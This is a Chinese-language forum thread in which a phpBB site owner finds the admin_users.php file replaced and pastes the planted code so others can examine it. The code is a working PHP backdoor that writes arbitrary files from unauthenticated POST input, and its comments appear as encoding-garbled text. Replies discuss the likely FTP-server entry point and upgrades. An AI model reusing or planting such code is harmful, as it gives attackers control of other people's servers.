[問題]請問這是被駭了嗎?

[jhung]

●架設主機作業系統：Windows Xp Pro SP2 有開防火牆
●快速架站程式：Appserv
●您的上網方式：ADSL
●您的 phpBB2 版本：phpBB 2.0.6
●您的 domain(網域名稱) ：www.gamejo.com
●您的 phpBB2 連結網址： http://www.gamejo.com
●錯誤狀態：

原本後台這個區域沒有東西的，這兩天沒進後台，今天一進去後台管理就出現這個欄位，]保存文件名...這個區域...還是簡體的...
我已經很久很久沒有再加裝外掛了~
請問這是被駭了嗎?

[Martinet]

應該是=口=...如果沒有其他人有修改權限的話..就是...|||

[jhung]

應該是=口=...如果沒有其他人有修改權限的話..就是...|||

是的~沒有其他人有修改權限...

糟糕...我對程式碼不熟...不知道去哪改囉...

先從admin.php和.TPL找起了...

唉...駭我的小香蕉做什麼...

[jhung]

找到一個他們改過的檔案admin_users.php
整個檔案被改成以下內容~

不過不知道什麼作用\r
有人可以幫忙看一下嗎?

代碼: 選擇全部

<?php
// Codz by angel on 2004, May 26
// Powered by Security Angel Team


// 壺蛌砱趼睫\r
function stripslashes_array(&$array) {
        while(list($key,$var) = each($array)) {
                if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
                        if (is_string($var)) {
                                $array[$key] = stripslashes($var);
                        }
                        if (is_array($var))  {
                                $array[$key] = stripslashes_array($var);
                        }
                }
        }
        return $array;
}

// 瓚剿 magic_quotes_gpc 袨怓
if (get_magic_quotes_gpc()) {
    $_POST = stripslashes_array($_POST);
}

// 硒俴紱釬\r
if($_POST['action']=="create")
{
        $fp=@fopen("".$_POST['filename']."","wb");
        $content = $_POST['filedate'];
        $fw=@fwrite($fp,$content);
        if ($fw) {
                echo "<b>鳩炰ㄛ迡恅璃傖髡ㄐ</b><a href=".$PHP_SELF.">殿隙</a>";
                exit;
        } else {
                echo "<b>迡恅璃囮啖ㄛ岆祥岆癹腔恀枙ˋ</b><a href=".$PHP_SELF.">殿隙</a>";
        }
        @fclose($fp);
}
?>

<form action="<?=$PHP_SELF?>" method="post">
悵湔腔恅璃靡(:<font color="#FF0000">angel.php</font>):<br>
<input type="text" name="filename" size="60">
<p>
恅璃悵湔婓:<br>
<?=str_replace('\\\','/',dirname(__FILE__))?>
<p>
恅璃囀:<br>
<textarea name="filedate" cols="60" rows="10"></textarea><br>
<input type="hidden" name="action" value="create"><input type="submit" value="悵湔">
</form>
<b>蛁砩ㄩ絞衄眈肮腔恅璃湔婓奀ㄛ蔚俇蜊迡囀ㄐ</b>

[webspirit]

安全天使小組？　
http://www.4ngel.net/

[jhung]

經朋友幫忙看~確定是被駭了~~
我用XP SP2 有開防火牆
我的PHPBB系統是 2.0.6
朋友説：
那支新的程式是一個檔案上傳的程式, 基本上駭客如果能放檔案到你的電腦上 他不需要放一支檔案上傳程式吧 感覺多此一舉。
PHPBB不太可能有這麼大的BUG，有可能是FTP有漏洞。

我決定升級PHPBB版本，換掉原本用的FTP伺服器軟體

給大家做參考

[jackyilk]

您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~

[webspirit]

這麼說不是 phpBB 的問題而是 FTP Server software 的問題囉

[文]

蠻好笑的...他還幫你寫個免費的上傳程式....哈哈哈（閃人～）

[jhung]

您能提供一下您所使用的FTP伺服器軟體嗎?
這樣讓有使用的人也可以警覺一下~

我原本是用這套
TYPSoft FTP Server
蠻陽春的~

線在在考慮整個討論區再升級了...可是...又回到資料庫不相容的問題了...

好煩阿~~~

[design]

唉...駭我的小香蕉做什麼...

對不起.. 我正在吃飯.. 笑到噴飯

這句太爆笑了 抱歉

應該替你感到婉息才對..

[joly]

大陸高手很多，這不算慘，都進到後台了，沒真的駭掉你的小香蕉，他目的只是在示威，呵呵！

[[ffs]hunej]

是有駭客作這檔事是為了提醒user注重安全性啦...
不過也不必這樣做吧......